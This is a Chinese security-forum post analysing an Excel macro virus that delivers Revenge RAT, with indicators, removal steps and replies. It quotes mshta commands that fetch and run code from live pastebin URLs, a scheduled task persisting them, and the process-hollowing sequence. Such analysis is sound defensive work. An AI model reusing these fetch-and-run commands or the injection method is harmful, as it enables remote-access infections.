吾愛破解 - LCG - LSG |安卓破解|病毒分析|破解軟件|www.kvamco.live

 找回密碼
 注冊[Register]

QQ登錄

只需一步,快速開始

搜索
查看: 13672|回復: 120
上一主題 下一主題

[PC樣本分析] xls宏病毒,程序不落地創建傀儡進程實現遠控

    [復制鏈接]
跳轉到指定樓層
樓主
Yennfer_ 發表于 2019-9-21 21:17 回帖獎勵
使用論壇附件上傳樣本壓縮包時必須使用壓縮密碼保護,壓縮密碼:52pojie,否則會導致論壇被殺毒軟件等誤報,論壇有權隨時刪除相關附件和帖子!
本帖最后由 Yennfer_ 于 2019-9-24 09:47 編輯

萌新分析,很多不足,請大佬們提出問題,共同學習。
基本信息
  
FileName  
  
FileSize  
  
FileType  
  
MD5  
  
Order_679873892xls  
  
47,4722 Byte  
  
Rat  
  
7641fef8abc7cb24b66655d11ef3daf2  

簡介
病毒是一個宏病毒,點擊啟用宏后會通過mshta.exe來訪問url,得到要執行的代碼,病毒會創建計劃任務與設置開機自啟,通過powershell執行代碼,從url得到兩段PE數據,通過宏加載第一個PE文件,然后通過第一個PE文件創建傀儡進程,傀儡進程是一個遠控
流程圖

詳細分析
解密
病毒會調用mshta.exe  http://bit.ly/8hsshjahassahsh 打開網站后,發現是空白,在瀏覽器F12,查看網絡請求,刷新頁面


往下滑,找到script代碼,復制出來,復制到瀏覽器的console


去掉結尾的</script>,把unscape之前的內容改為console.log(,輸出解密結果


StrReverse作用是使字符串反序,整理一下


最后會執行命令  WScript.Shell.RUN mshta http://www.pastebin.com/raw/nv5d9pYu
訪問這個url后會發現這個頁面已經掛了,但是在ANYRUN有人跑過這個樣本,可以看見傳回的參數


同樣的方法在console跑一遍,然后整理一下

結束進程
第一段代碼,調用CMD關閉進程winword.exe、excel.exe、MSPUB.exe、POWERPNT.exe

創建計劃任務
第二段代碼,創建一個計劃任務,名為Windows Update,每60分鐘執行一次,執行的內容是
mshta.exehttp://pastebin.com/raw/vXpe74L2

解密計劃任務執行的內容
在瀏覽器打開url后,全都是混淆的代碼


用一樣的方法在Console里面用Console.log輸出出來


復制到notepad++,看見代碼最下面有個replace


按Ctrl+H將中間的字符串替換掉


得到兩個字符串,用StrReverse函數將字符串反過來,最后是用powershell執行這段代碼


代碼解密出來為


利用powershell執行,第三行的代碼來自url https://pastebin.com/raw/wMG90xwi


經過解密后:得到一個MZ頭的PE數據


第四行的代碼url為 https://pastebin.com/raw/W455MkAZ


經過解密后,也可以得到MZ開頭的數據

給創建傀儡進程傳參
這里先創建一個實例,類和方法都來自第一段數據dll中,然后傳入兩個參數,第一個是創建的進程名“MSBuiler.exe”,第二個參數是第二段獲取的PE結構數據

調用powershell,執行上面代碼


第二段代碼內容:


創建計劃任務
訪問 http://pastebin.com/raw//JdTuFmc5 獲得要執行的代碼


和前面一樣,改成console.log


解密之后,發現與上一段代碼相同,只是計劃任務時間從60分鐘運行一次,變成了300分鐘運行一次修改注冊表
第四段代碼修改注冊表,內容是http://pastebin.com/raw/CGe3S2Vf取回的內容




一樣,放進console里面,改成console.log,解密出的代碼如圖


最后還是和前兩段一樣的內容,在注冊表自啟動中寫入,利用Powershell執行代碼


反混淆
通過前面MSBuilder.exe編譯可以得到兩個PE文件,一個DLL,一個EXE,都是用.net編譯,都可用de4dot反混淆


反混淆后使用dnSpy查看dll文件,發現其中還是有很多混淆,是ConfuerEX,用工具解一下ConfuerEX混淆
解混淆之前:


解混淆之后:


在JS代碼最后,會調用.dll中的類和方法



創建傀儡進程
在Dodo函數傳入兩個參數,第一個是JS代碼中寫的MSBuilder,第二個是JS代碼中的$f,就是前面解密出的exe文件


在五個目錄下查找MSBuilder.exe


當查找到MSBuilder后,就執行下面的代碼


這個地方調用了tickleme函數,tickleme函數又調用了PEHeaderE和FUN函數


PEHeaderE函數:


FUN函數里又調用了Smethod_0函數,傳入的第一個參數是MSBuidler.exe第二個參數是exe的十六進制數據


Smethod_0函數,先創建了一個MSBuilder的進程


獲取到EXE的PE頭和ImageBase


判斷是32位系統或64位系統,調用獲取線程上下文函數


從內存中讀取4字節數據,然后卸載映像,清空內存,方便后面注入


得到exe ImageBase的大小然后申請對應大小的空間


在申請的空間中寫入exe的header


然后獲取到節表,遍歷寫入節表的所有節




將前面獲取到的線程上下文放回,然后喚醒線程,完成創建傀儡進程,執行exe里的內容

EXE
exe中可以看見C2服務器信息、互斥量、ID等信息


進來先找到main函數


.SCG就是new的自己,然后再調用Execute()函數,Execute函數內分別是This.SC、This.PT、This.INST三個函數,每個函數創建了一共線程,執行不同的代碼


其中包含有對C2服務器的TCP鏈接

獲得主機各種信息包括病毒ID、IP、主機名、系統信息、內存、殺軟信息等,并用key值(lunlaylo)做分隔符,然后發送到服務器

谷歌了一下互斥量“RV_MUTEX-WindowsUpdateSysten32”,發現是一個成熟的遠控,名叫” Revenge Rat”
樣本溯源
  
File Name  
  
MD5  
  
Order_679873892xls  
  
7641fef8abc7cb24b66655d11ef3daf2  
  
.dll  
  
d1726dc5808c22be63507e06bbdc087  
  
.exe  
  
esd785a808f7272fb79E33a66570d844  

  
C2:  
  
meandmyjoggar.duckdns.org  
  
URL:  
  
http://www.pastebin.com/raw/nv5d9pYu  
  
  
  
http://pastebin.com/raw/vXpe74L2  
  
  
  
https://pastebin.com/raw/W455MkAZ  
  
  
  
http://pastebin.com/raw//JdTuFmc5  
  
  
  
http://pastebin.com/raw/CGe3S2Vf  
  
MUTEX:  
  
RV_MUTEX-WindowsUpdateSysten32  
查殺方案
刪除注冊表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate
刪除名為Windows Update和Update的調用mshta.exe的計劃任務
結束進程“MSBuilder.exe
總結
病毒使用excel中的宏執行代碼,執行的代碼都是從url中獲取然后解密出來得到,添加的自啟動或計劃任務也沒有程序落地,每次運行都從url得到數據創建一個傀儡進程實現遠控

免費評分

參與人數 86吾愛幣 +82 熱心值 +79 收起 理由
紅云飛袖 + 1 用心討論,共獲提升!
lsj凌松 + 1 一點看不懂就覺得很牛!
假助天下第一 + 1 用心討論,共獲提升!
鴿吻與鴿舞 + 1 + 1 我很贊同!
花二娘 + 1 + 1 今天宏中病毒,默認后綴xlsx變xlsm了,如何刪除回復之前的文件,雖然有備份.
BEdasabi + 1 + 1 [email protected]
牧魚龍 + 1 + 1 用心討論,共獲提升!
sainoa + 1 + 1 我很贊同!
840097782 + 1 + 1 熱心回復!
4oo4 + 1 + 1 用心討論,共獲提升!
愛情避風港a + 1 用心討論,共獲提升!
jerkyman + 1 + 1 用心討論,共獲提升!
吾愛Po解啊 + 1 + 1 感謝發布原創作品,吾愛破解論壇因你更精彩!
Jq1212 + 1 + 1 感謝發布原創作品,吾愛破解論壇因你更精彩!
mf1359 + 1 + 1 熱心回復!
zswseu + 1 + 1 我很贊同!
staty + 1 + 1 用心討論,共獲提升!
Tomcrack520 + 1 用心討論,共獲提升!
gym_168 + 1 + 1 熱心回復!
ch12 + 1 + 1 [email protected]
nhy1989 + 1 + 1 我很贊同!
xsmxsm + 1 + 1 我很贊同!
99910369 + 1 + 1 用心討論,共獲提升!
SpaceX + 1 + 1 感謝發布原創作品,吾愛破解論壇因你更精彩!
FoundWay + 1 + 1 用心討論,共獲提升!
oudy + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
luzhiyao + 1 我很贊同!
weki + 1 + 1 [email protected]
WZCLCY + 1 我很贊同!
九重桂妖 + 1 [email protected]
開光財神爺 + 1 + 1 不懂,很牛逼的樣子
Clear杰杰 + 1 大佬厲害,收徒弟嗎
道極承天 + 1 + 1 看完分析我決定好好學習編程了,不然代碼都看不懂
王紫 + 1 + 1 我很贊同!
Minesa + 1 + 1 用心討論,共獲提升!
qq499216557 + 1 + 1 牛批,大神牛批。
★殤絮↘_溫渘☆ + 1 + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
朱朱你墮落了 + 3 + 1 膜拜大佬,就是純粹給你加分的。
w92vv + 1 + 1 厲害了
愛拍陰天 + 1 + 1 我很贊同!
0xFF + 1 + 1 鼓勵轉貼優秀軟件安全工具和文檔!
gaosld + 1 + 1 用心討論,共獲提升!
xuing + 1 + 1 [email protected]
極品黑車 + 1 + 1 感謝發布原創作品,吾愛破解論壇因你更精彩!
濤之雨 + 1 + 1 用心討論,共獲提升!
華科A + 1 + 1 感謝發布原創作品,吾愛破解論壇因你更精彩!
000000 + 1 + 1 用心討論,共獲提升!
22222 + 1 + 1 我很贊同!
wapjphl + 1 + 1 用心討論,共獲提升!
soyiC + 1 + 1 用心討論,共獲提升!
crysky7ye + 1 + 1 你真厲害。
daniel7785 + 1 用心討論,共獲提升!
4everlove + 1 + 1 用心討論,共獲提升!
N0LL + 1 + 1 [email protected]
Spareks + 1 + 1 用心討論,共獲提升!
諸葛陽明 + 1 + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
Acker + 1 + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
po1718 + 2 + 1 必須點贊!
xiaofengzi + 1 + 1 用心討論,共獲提升!
wg521125 + 1 + 1 看的一陣頭大,不知不覺我都不知道中了多少病毒木馬了
LASSAFEVER + 1 + 1 用心討論,共獲提升!
男貓 + 1 + 1 用心討論,共獲提升!
軟軟? + 1 + 1 熱心回復!
天空藍 + 1 + 1 感謝發布原創作品,吾愛破解論壇因你更精彩!
Chlrun + 1 + 1 我很贊同!
2019ghua + 1 + 1 解剖得很細致,大神多出點入門級的分析 ,請教PE文件是啥文件
Minami + 1 + 1 用心討論,共獲提升!
tz_being + 1 + 1 我很贊同!
PearlyNautilus + 1 用心討論,共獲提升!
老白啊 + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
少林大蝦 + 1 熱心回復!
lk19870906 + 1 我很贊同!
yzlovew + 1 + 1 加精警告
zhan + 1 + 1 [email protected]
bakaest + 1 + 1 第一次聽說Revenge rat
jfyhob + 1 + 1 用心討論,共獲提升!
愛無悔 + 1 + 1 用心討論,共獲提升!
wanmei + 2 + 1 用心討論,共獲提升!
冷孤幽 + 1 + 1 用心討論,共獲提升!
asd42450 + 1 + 1 我很贊同!
猴子丶 + 1 + 1 [email protected]
冰雪冬櫻250 + 1 + 1 [email protected]
妖寒 + 1 + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
Blank空白 + 1 + 1 還能說什么呢?大老牛逼
漂泊的雪 + 1 + 1 鼓勵轉貼優秀軟件安全工具和文檔!
危大人 + 1 + 1 一點看不懂就覺得很牛

查看全部評分

發帖前要善用論壇搜索功能,那里可能會有你要找的答案或者已經有人發布過相同內容了,請勿重復發帖。

推薦
gym_168 發表于 2019-10-28 20:27
Yennfer_ 發表于 2019-9-23 10:04
是的,就是excel里面的宏,不過office現在默認是禁止的,只要你不點“啟用宏”,就應該沒啥問題

vba也有防不啟用宏文件就不能打開的方法,換句話說在打開文件時,如果你不運行宏,那文件就會自動關閉不讓你用
推薦
 樓主| Yennfer_ 發表于 2019-9-23 10:06 <
chmod755 發表于 2019-9-23 09:54
樓主分析的很詳細,其實這種調用powershell的,偷個懶,直接去找最后一行的run  把它替換成寫入到文件,不 ...

powershell 運行的是mshta url, 中途每一行代碼都是url,當時看昏了就沒想到,學習了哈哈
4#
戰言灬永不敗 發表于 2019-9-21 21:32
完全看不懂大佬在說什么,但還是要支持一下!
5#
ncic 發表于 2019-9-21 22:59
看標題很牛進來的,不明覺厲了!
6#
冰雪冬櫻250 發表于 2019-9-22 09:15
雖然看不到懂,但支持一下
7#
Hmily 發表于 2019-9-22 09:21
空間大小限制沒起到有用的地方,倒是帶來了麻煩,晚點我直接取消,抱歉。

免費評分

參與人數 1熱心值 +1 收起 理由
濤之雨 + 1 H大辛苦了!活捉H大!(滑稽護體,溜!)

查看全部評分

8#
wanmei 發表于 2019-9-22 10:48
真正的大佬。
9#
hercity 發表于 2019-9-22 10:49
感謝大佬的研究。我雖然看不懂,但覺得對我有巨大幫助,謝謝大佬。添加收藏了。辛苦了
10#
Peacefuler 發表于 2019-9-22 12:29
感謝分享,看不懂也支持一下。
11#
6263085 發表于 2019-9-22 12:53
看標題很牛進來的,不明覺厲了!進來支持一下
12#
limit81995 發表于 2019-9-22 14:21
看不懂{:1_937:
您需要登錄后才可以回帖 登錄 | 注冊[Register]

本版積分規則 警告:禁止回復與主題無關內容,違者重罰!

快速回復 收藏帖子 返回列表 搜索

RSS訂閱|小黑屋|聯系我們|吾愛破解 - LCG - LSG ( 京ICP備16042023號 | 京公網安備 11010502030087號 )

GMT+8, 2019-12-13 20:59

Powered by Discuz!

© 2001-2017 Comsenz Inc.

快速回復 返回頂部 返回列表
3d开机号今天